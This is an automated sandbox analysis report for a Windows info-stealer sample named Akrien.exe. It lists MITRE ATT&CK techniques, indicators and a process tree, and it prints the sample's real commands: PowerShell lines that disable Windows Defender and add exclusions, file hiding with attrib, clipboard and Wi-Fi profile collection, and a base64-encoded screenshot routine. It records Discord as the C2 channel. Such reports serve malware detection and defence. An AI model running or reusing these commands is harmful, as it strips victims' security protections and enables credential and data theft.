8b70b1938bdbdcc669467362359d7adea56186bcaca29a72ae6b906e44a9d052

Analysis

max time kernel
51s
max time network
50s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
04-10-2024 22:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Akrien.exe
Size

8.3MB
MD5

c8237fbc1ebb6df62b9e7f267354988c
SHA1

c5c12dda9dab7b450d770745f65f131c6fdb58b5
SHA256

a7cfed3a6ef2d5ea805ac1ceb40eb8d4fa0328b50b884d72123d07f229a7fa3f
SHA512

1e63b6c87e9e80df5c5f43828d5ff1f73eadf3b261e1072cdd9228cfe190217e408f4259f437706d63540589f8ea4dbced184e5b0e3810c5277e130df96240a6
SSDEEP

196608:u/uqmN0ZqZMwfI9jUC2XMvH8zPjweaBpZ0cM6T2ooccXK7oS7:LOiIH2XgHq+jq8S3Yo2

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2232	powershell.exe
1400	powershell.exe
5060	powershell.exe
432	powershell.exe
3544	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Akrien.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4012	cmd.exe
4808	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2960	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe
1684	Akrien.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	discord.com
5	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2996	tasklist.exe
4236	tasklist.exe
4364	tasklist.exe
4244	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3816	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000100000002aa4f-63.dat	upx
behavioral2/memory/1684-67-0x00007FFB3B610000-0x00007FFB3BCD2000-memory.dmp	upx
behavioral2/files/0x000100000002aa1b-70.dat	upx
behavioral2/files/0x000100000002aa20-127.dat	upx
behavioral2/files/0x000100000002aa1f-126.dat	upx
behavioral2/files/0x000100000002aa1e-125.dat	upx
behavioral2/files/0x000100000002aa1d-124.dat	upx
behavioral2/files/0x000100000002aa1c-123.dat	upx
behavioral2/files/0x000100000002aa1a-122.dat	upx
behavioral2/files/0x000100000002aa55-121.dat	upx
behavioral2/files/0x000100000002aa53-120.dat	upx
behavioral2/files/0x000100000002aa52-119.dat	upx
behavioral2/files/0x000100000002aa4e-116.dat	upx
behavioral2/files/0x000100000002aa4c-115.dat	upx
behavioral2/memory/1684-100-0x00007FFB55B70000-0x00007FFB55B7F000-memory.dmp	upx
behavioral2/memory/1684-83-0x00007FFB569A0000-0x00007FFB569C5000-memory.dmp	upx
behavioral2/files/0x000100000002aa4d-72.dat	upx
behavioral2/memory/1684-132-0x00007FFB50F40000-0x00007FFB50F6C000-memory.dmp	upx
behavioral2/memory/1684-133-0x00007FFB527C0000-0x00007FFB527D9000-memory.dmp	upx
behavioral2/memory/1684-134-0x00007FFB50060000-0x00007FFB50084000-memory.dmp	upx
behavioral2/memory/1684-135-0x00007FFB4C7D0000-0x00007FFB4C94F000-memory.dmp	upx
behavioral2/memory/1684-136-0x00007FFB50F20000-0x00007FFB50F39000-memory.dmp	upx
behavioral2/memory/1684-137-0x00007FFB55B60000-0x00007FFB55B6D000-memory.dmp	upx
behavioral2/memory/1684-138-0x00007FFB50020000-0x00007FFB50053000-memory.dmp	upx
behavioral2/memory/1684-139-0x00007FFB3B610000-0x00007FFB3BCD2000-memory.dmp	upx
behavioral2/memory/1684-143-0x00007FFB569A0000-0x00007FFB569C5000-memory.dmp	upx
behavioral2/memory/1684-142-0x00007FFB48DB0000-0x00007FFB492E3000-memory.dmp	upx
behavioral2/memory/1684-140-0x00007FFB4D030000-0x00007FFB4D0FE000-memory.dmp	upx
behavioral2/memory/1684-144-0x00007FFB50000000-0x00007FFB50014000-memory.dmp	upx
behavioral2/memory/1684-145-0x00007FFB50F40000-0x00007FFB50F6C000-memory.dmp	upx
behavioral2/memory/1684-146-0x00007FFB4FFF0000-0x00007FFB4FFFD000-memory.dmp	upx
behavioral2/memory/1684-150-0x00007FFB527C0000-0x00007FFB527D9000-memory.dmp	upx
behavioral2/memory/1684-151-0x00007FFB4CCC0000-0x00007FFB4CDDA000-memory.dmp	upx
behavioral2/memory/1684-180-0x00007FFB50060000-0x00007FFB50084000-memory.dmp	upx
behavioral2/memory/1684-287-0x00007FFB4C7D0000-0x00007FFB4C94F000-memory.dmp	upx
behavioral2/memory/1684-336-0x00007FFB50F20000-0x00007FFB50F39000-memory.dmp	upx
behavioral2/memory/1684-346-0x00007FFB55B60000-0x00007FFB55B6D000-memory.dmp	upx
behavioral2/memory/1684-349-0x00007FFB50020000-0x00007FFB50053000-memory.dmp	upx
behavioral2/memory/1684-351-0x00007FFB4D030000-0x00007FFB4D0FE000-memory.dmp	upx
behavioral2/memory/1684-362-0x00007FFB48DB0000-0x00007FFB492E3000-memory.dmp	upx
behavioral2/memory/1684-372-0x00007FFB50000000-0x00007FFB50014000-memory.dmp	upx
behavioral2/memory/1684-374-0x00007FFB569A0000-0x00007FFB569C5000-memory.dmp	upx
behavioral2/memory/1684-379-0x00007FFB4C7D0000-0x00007FFB4C94F000-memory.dmp	upx
behavioral2/memory/1684-373-0x00007FFB3B610000-0x00007FFB3BCD2000-memory.dmp	upx
behavioral2/memory/1684-433-0x00007FFB3B610000-0x00007FFB3BCD2000-memory.dmp	upx
behavioral2/memory/1684-456-0x00007FFB55B60000-0x00007FFB55B6D000-memory.dmp	upx
behavioral2/memory/1684-458-0x00007FFB4D030000-0x00007FFB4D0FE000-memory.dmp	upx
behavioral2/memory/1684-457-0x00007FFB50020000-0x00007FFB50053000-memory.dmp	upx
behavioral2/memory/1684-461-0x00007FFB4CCC0000-0x00007FFB4CDDA000-memory.dmp	upx
behavioral2/memory/1684-460-0x00007FFB4FFF0000-0x00007FFB4FFFD000-memory.dmp	upx
behavioral2/memory/1684-459-0x00007FFB50000000-0x00007FFB50014000-memory.dmp	upx
behavioral2/memory/1684-455-0x00007FFB50F20000-0x00007FFB50F39000-memory.dmp	upx
behavioral2/memory/1684-454-0x00007FFB4C7D0000-0x00007FFB4C94F000-memory.dmp	upx
behavioral2/memory/1684-453-0x00007FFB50060000-0x00007FFB50084000-memory.dmp	upx
behavioral2/memory/1684-452-0x00007FFB527C0000-0x00007FFB527D9000-memory.dmp	upx
behavioral2/memory/1684-451-0x00007FFB50F40000-0x00007FFB50F6C000-memory.dmp	upx
behavioral2/memory/1684-450-0x00007FFB55B70000-0x00007FFB55B7F000-memory.dmp	upx
behavioral2/memory/1684-449-0x00007FFB569A0000-0x00007FFB569C5000-memory.dmp	upx
behavioral2/memory/1684-448-0x00007FFB48DB0000-0x00007FFB492E3000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2332	cmd.exe
1552	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
548	cmd.exe
4940	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1352	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
948	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1552	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2232	powershell.exe
5060	powershell.exe
2232	powershell.exe
1400	powershell.exe
5060	powershell.exe
1400	powershell.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
432	powershell.exe
432	powershell.exe
3744	powershell.exe
3744	powershell.exe
3544	powershell.exe
3544	powershell.exe
776	powershell.exe
776	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	2996	tasklist.exe
Token: SeDebugPrivilege	4236	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4364	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	4244	tasklist.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeIncreaseQuotaPrivilege	2776	WMIC.exe
Token: SeSecurityPrivilege	2776	WMIC.exe
Token: SeTakeOwnershipPrivilege	2776	WMIC.exe
Token: SeLoadDriverPrivilege	2776	WMIC.exe
Token: SeSystemProfilePrivilege	2776	WMIC.exe
Token: SeSystemtimePrivilege	2776	WMIC.exe
Token: SeProfSingleProcessPrivilege	2776	WMIC.exe
Token: SeIncBasePriorityPrivilege	2776	WMIC.exe
Token: SeCreatePagefilePrivilege	2776	WMIC.exe
Token: SeBackupPrivilege	2776	WMIC.exe
Token: SeRestorePrivilege	2776	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1684	1976	Akrien.exe	78
PID 1976 wrote to memory of 1684	1976	Akrien.exe	78
PID 1684 wrote to memory of 3744	1684	Akrien.exe	79
PID 1684 wrote to memory of 3744	1684	Akrien.exe	79
PID 1684 wrote to memory of 2272	1684	Akrien.exe	80
PID 1684 wrote to memory of 2272	1684	Akrien.exe	80
PID 1684 wrote to memory of 3816	1684	Akrien.exe	81
PID 1684 wrote to memory of 3816	1684	Akrien.exe	81
PID 1684 wrote to memory of 2600	1684	Akrien.exe	82
PID 1684 wrote to memory of 2600	1684	Akrien.exe	82
PID 3744 wrote to memory of 2232	3744	cmd.exe	87
PID 3744 wrote to memory of 2232	3744	cmd.exe	87
PID 3816 wrote to memory of 2196	3816	cmd.exe	88
PID 3816 wrote to memory of 2196	3816	cmd.exe	88
PID 2272 wrote to memory of 5060	2272	cmd.exe	89
PID 2272 wrote to memory of 5060	2272	cmd.exe	89
PID 2600 wrote to memory of 1400	2600	cmd.exe	90
PID 2600 wrote to memory of 1400	2600	cmd.exe	90
PID 1684 wrote to memory of 5020	1684	Akrien.exe	91
PID 1684 wrote to memory of 5020	1684	Akrien.exe	91
PID 1684 wrote to memory of 4548	1684	Akrien.exe	92
PID 1684 wrote to memory of 4548	1684	Akrien.exe	92
PID 5020 wrote to memory of 2996	5020	cmd.exe	95
PID 5020 wrote to memory of 2996	5020	cmd.exe	95
PID 4548 wrote to memory of 4236	4548	cmd.exe	96
PID 4548 wrote to memory of 4236	4548	cmd.exe	96
PID 1684 wrote to memory of 4824	1684	Akrien.exe	97
PID 1684 wrote to memory of 4824	1684	Akrien.exe	97
PID 1684 wrote to memory of 4012	1684	Akrien.exe	99
PID 1684 wrote to memory of 4012	1684	Akrien.exe	99
PID 1684 wrote to memory of 3400	1684	Akrien.exe	100
PID 1684 wrote to memory of 3400	1684	Akrien.exe	100
PID 1684 wrote to memory of 4008	1684	Akrien.exe	102
PID 1684 wrote to memory of 4008	1684	Akrien.exe	102
PID 1684 wrote to memory of 548	1684	Akrien.exe	105
PID 1684 wrote to memory of 548	1684	Akrien.exe	105
PID 4012 wrote to memory of 4808	4012	cmd.exe	107
PID 4012 wrote to memory of 4808	4012	cmd.exe	107
PID 1684 wrote to memory of 1876	1684	Akrien.exe	109
PID 1684 wrote to memory of 1876	1684	Akrien.exe	109
PID 4824 wrote to memory of 3048	4824	cmd.exe	110
PID 4824 wrote to memory of 3048	4824	cmd.exe	110
PID 1684 wrote to memory of 1808	1684	Akrien.exe	112
PID 1684 wrote to memory of 1808	1684	Akrien.exe	112
PID 1684 wrote to memory of 3476	1684	Akrien.exe	113
PID 1684 wrote to memory of 3476	1684	Akrien.exe	113
PID 4008 wrote to memory of 4520	4008	cmd.exe	114
PID 4008 wrote to memory of 4520	4008	cmd.exe	114
PID 3400 wrote to memory of 4364	3400	cmd.exe	117
PID 3400 wrote to memory of 4364	3400	cmd.exe	117
PID 548 wrote to memory of 4940	548	cmd.exe	118
PID 548 wrote to memory of 4940	548	cmd.exe	118
PID 1684 wrote to memory of 3316	1684	Akrien.exe	119
PID 1684 wrote to memory of 3316	1684	Akrien.exe	119
PID 3476 wrote to memory of 4944	3476	cmd.exe	121
PID 3476 wrote to memory of 4944	3476	cmd.exe	121
PID 1876 wrote to memory of 948	1876	cmd.exe	120
PID 1876 wrote to memory of 948	1876	cmd.exe	120
PID 1808 wrote to memory of 2868	1808	cmd.exe	123
PID 1808 wrote to memory of 2868	1808	cmd.exe	123
PID 3316 wrote to memory of 4884	3316	cmd.exe	124
PID 3316 wrote to memory of 4884	3316	cmd.exe	124
PID 1684 wrote to memory of 4796	1684	Akrien.exe	125
PID 1684 wrote to memory of 4796	1684	Akrien.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2196	attrib.exe
2564	attrib.exe
4516	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Akrien.exe
"C:\Users\Admin\AppData\Local\Temp\Akrien.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Users\Admin\AppData\Local\Temp\Akrien.exe
  "C:\Users\Admin\AppData\Local\Temp\Akrien.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Akrien.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Akrien.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Akrien.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3816
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Akrien.exe"
      4⤵
      Views/modifies file attributes
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4824
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcA